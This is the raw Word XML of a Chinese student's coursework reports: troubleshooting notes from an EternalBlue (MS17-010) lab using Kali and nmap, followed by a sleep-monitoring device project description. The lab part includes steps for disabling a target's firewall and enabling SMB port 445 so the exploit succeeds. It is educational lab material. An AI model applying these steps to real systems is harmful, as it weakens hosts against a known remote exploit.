        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5751195" cy="1188085"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>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27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5751195" cy="1188085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4383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pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（图十九）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158BFDEC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A83FE16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>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问题和解决</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69633A9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>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Kali Linux 是英文版的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E2EB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我先上网查询后了解到英文是Kali Linux 虚拟机的初始语言，因此我解决问题的方向从换一下kali linux的镜像，到把我的kali linux虚拟机的语言改为中文。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662BECA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步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A93BE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首先，进入终端输入“sudo -i”,输入密码以root用户身份登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3AD95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然后，输入“apt install ttf-wqy-zenhei”安装中文字体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E84844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再输入“dpkg-reconfigure locales”会进入区域设置界面，选中“zh_CN.UTF-8 UTF-8”确认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF820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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后重启，就变成简体中文的了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B628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jc w:val="both"/>
        <w:textAlignment w:val="auto"/>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2、nmap扫描靶机IP扫描不到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307DB4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先了解到nmap是Network Mapper（网络映射器）的简称，它是一款免费、开源的网络扫描和安全审计工具。通过nmap，用户可以扫描网络中的主机，发现其开放的端口、运行的服务、操作系统类型以及可能存在的安全漏洞等信息。还有防火墙可能会配置规则来过滤掉某些类型的网络请求，包括Nmap发送的扫描请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160AAE8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因此我要解决这个问题就要关闭靶机的防火墙。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6EC90B">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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6267450" cy="4410075"/>
            <wp:effectExtent l="0" t="0" r="6350" b="952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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6267450" cy="4410075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="073ACA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jc w:val="center"/>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（关闭防火墙前）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1054772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2" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（图二十）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE42CC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3762375" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3762375" cy="2362200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9C6371">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1920" w:firstLineChars="800"/>
        <w:jc w:val="both"/>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（关闭防火墙后）（图二十一）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBE66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在关闭防火墙后再次使用nmap搜索局域网节点，就出现了靶机的IP以及靶机的端口信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3129859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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297CB707">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3、搜索到ms17_010后攻击靶机攻击不成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E227747">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首先我了解到MS17-010漏洞是一种针对Windows系统中SMB（Server Message Block）协议的缓冲区溢出漏洞。以及端口445主要用于微软的SMB协议。所以我得出结论攻击者可以通过扫描开放445端口的Windows机器，利用MS17-010漏洞进行远程代码执行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140C53A5">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445端口打开方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B1A73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进入靶机的cmd中，输入regedit进入注册表编辑器，找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D15F67">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>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下的‘SMBDeviceEnabled’并把它的值改为1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ADD99A">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以上就是我在做永恒之蓝漏洞利用实验中遇到的三个问题以及解决问题的思考过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC16E8">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14:paraId="7ECB9234">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2455D4D3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0298A231">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络空间安全实践</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B6F2B4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>雏燕项目介绍及个人收获与成长</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6CFD73">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="both"/>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我上学期的雏燕计划理想是辅助睡眠智能监控设备，在项目准备过程中学到了新的东西也获得了一定成长。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A50C0B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>项目背景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7828F9B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随着科技发展，生活水平的提高，人类对生活质量的要求日益提升。睡眠是人类旺盛精力的源泉，只有充足的睡眠，才能保证工作效率，创造更多的价值。然而失眠却成为亟待解决的一重大课题，WHO(世界卫生组织)调查显示失眠的发病率约为27%，而中国的失眠发病率高达38.2%，高发人群中，孕妇和更年期妇女由于激素水平的变化导致失眠，其发病率约为75%；老年人中，65岁以上的人群多由于身体的衰老、自身疾病、社会心理压力等因素导致失眠，其发病率在57%，职场白领人群由于较大的工作压力也易导致失眠，其发病率也较高。一些事业人士喝咖啡，其他很多人进行药物摄取，这不仅对身体产生强大负荷作用而且长期的药物处理会产生依赖性，甚至影响激素的分泌平衡。长期以往的方法终究无法改变失眠人身体过度疲劳的现状，应用新科技改善睡眠质量，延长有效睡眠时间，加深睡眠效果才是真正有前景的道路，因此我们需要能够改善睡眠质量的有效系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B119ADE">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基于上述背景以及本团队的理论研究和具体实践，得出结论：寻找到更高效入睡的方法，构建能够为睡眠指标及睡眠环境进行实时监控的系统设备是满足以上相关群体需求的有效途径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138D64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val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二、项目设计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1293625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首先，该项目产品采用高精度的生物传感器，如心率传感器、呼吸传感器、体动传感器等，实时监测用户的生理指标，以准确评估睡眠质量。这些传感器可以精确地测量用户的心率变化、呼吸频率，体动频率，从而提供详细的睡眠分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDF0D6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其次，本项目产品以app的形式建立一个综合的睡眠健康管理平台。用户可以蓝牙连接手机，并在平台上观测自己的睡眠质量评估，同时可以记录睡眠日志、查看健康数据、参与社区讨论等，形成一个全方位的睡眠健康管理生态系统。平台可以提供个性化的睡眠建议和优化方案，用户可以通过平台追踪和分析睡眠数据，了解自己的睡眠习惯和健康状况，并与其他用户分享经验和建议。通过环境传感器，监测室内的温度、湿度、噪音等因素对睡眠的影响，并提供相应的优化建议，在app平台查看，帮助用户创造更理想的睡眠</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境。例如，如果环境温度过高或噪音过大，设备可以提示调节空调或提供白噪音，以提供更舒适的睡眠环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294D9D1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然后我们的项目具有舒适的佩戴体验：采用柔软舒适的材质，人体工学设计，确保设备佩戴时的舒适度和稳定性，不会对用户的睡眠造成干扰。设备应该轻便、柔软，并且适应不同大小的头部和脸型，以确保用户可以长时间佩戴而不感到不适。并且产品是高度个性化的，能够提供更个性化和便捷的操作体验，用户可以通过app来控制设备的各种功能，例如调整音量、切换音乐、调整声音大小、查看睡眠报告等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3FB19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产品还可以实现睡眠环境优化，产品内置一个环境监测设备通过蓝牙与手机app连接，可以通过收集到的数据，提醒用户调节室内的灯光、排除噪音、开窗通风提高空气质量等，为用户提供更舒适的睡眠环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C40CF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color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>同时，本产品具备可拆卸的设计，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>将设备设计成可拆卸的结构，耳塞部分和眼罩部分可以分开，眼罩部分不含线路、电子设备或是含有一些线路和电子设备但是可以和眼罩外套分开，方便用户清洁。耳塞部分则可以放入类似蓝牙耳机的充电盒内进行充电。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B75B961">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>三、本人任务和收获</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67215734">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在这次雏燕项目中担任组长的工作，在项目最开始跟小组同学一起提出项目备选项，然后决定项目选择。之后一起进行了关于项目产品的创新点和设计成果的思考和讨论，然后完成了立项申请书。在项目进行中担任部分技术方面的问题。在项目立项后，召集小组成员展开项目汇报。合作交流项目技术难点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53254FF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default"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我认为在这次雏燕计划项目中，锻炼了组织交流的能力，然后对于计算机技术的掌握有了更深入的了解。其次，其实这次的项目开始计划的比较好，却没有进行成功，我认为是自己和小组成员均处于刚进入大学的时期，对新接触的计算机技术有一定的畏难心理所导致的。在下一次的组队做的项目里，我想要担当更多技术上的突破者，以更完美的完成项目。</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId4" w:type="default"/>
      <w:footerReference r:id="rId5" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="851" w:footer="850"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3E6D9C">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B946FC">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4B0D07">
    <w:pPr>
      <w:pStyle w:val="11"/>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5E0750C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15E075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4A9C0CA8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4A9C0CA8"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="53EA4DB5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="53EA4DB5"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="722D130F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="722D130F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="78030B34"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="78030B34"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="7C3B1F64"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7C3B1F64"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="3"/>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JkODRiZTJkNTM2YWY1Y2JmOTNkNTM4YjQ5ZDU2ZTEifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00CB3291"/>
    <w:rsid w:val="000024C8"/>
    <w:rsid w:val="00004565"/>
    <w:rsid w:val="00005AF4"/>
    <w:rsid w:val="000330C4"/>
    <w:rsid w:val="000353B4"/>
    <w:rsid w:val="000438F2"/>
    <w:rsid w:val="00050338"/>
    <w:rsid w:val="00051008"/>
    <w:rsid w:val="00052AA1"/>
    <w:rsid w:val="0005478C"/>
    <w:rsid w:val="000621EF"/>
    <w:rsid w:val="00062C60"/>
    <w:rsid w:val="00064916"/>
    <w:rsid w:val="00064D91"/>
    <w:rsid w:val="00065303"/>
    <w:rsid w:val="00072D6F"/>
    <w:rsid w:val="00075674"/>
    <w:rsid w:val="00077AFB"/>
    <w:rsid w:val="00077B3A"/>
    <w:rsid w:val="000847D0"/>
    <w:rsid w:val="000914A5"/>
    <w:rsid w:val="0009279E"/>
    <w:rsid w:val="00095EA3"/>
    <w:rsid w:val="000970FB"/>
    <w:rsid w:val="000B157B"/>
    <w:rsid w:val="000B1A72"/>
    <w:rsid w:val="000B2105"/>
    <w:rsid w:val="000B2B5C"/>
    <w:rsid w:val="000C7B33"/>
    <w:rsid w:val="000D177F"/>
    <w:rsid w:val="000D32A3"/>
    <w:rsid w:val="000E0780"/>
    <w:rsid w:val="000E0999"/>
    <w:rsid w:val="000E0D93"/>
    <w:rsid w:val="000E33F8"/>
    <w:rsid w:val="000E4A72"/>
    <w:rsid w:val="000E6223"/>
    <w:rsid w:val="000F10BD"/>
    <w:rsid w:val="000F3711"/>
    <w:rsid w:val="000F5157"/>
    <w:rsid w:val="000F59FE"/>
    <w:rsid w:val="000F644F"/>
    <w:rsid w:val="00101756"/>
    <w:rsid w:val="00102166"/>
    <w:rsid w:val="00104FD2"/>
    <w:rsid w:val="00110C3C"/>
    <w:rsid w:val="0011200C"/>
    <w:rsid w:val="001126B0"/>
    <w:rsid w:val="00112F3F"/>
    <w:rsid w:val="001140B5"/>
    <w:rsid w:val="001214BF"/>
    <w:rsid w:val="001237E3"/>
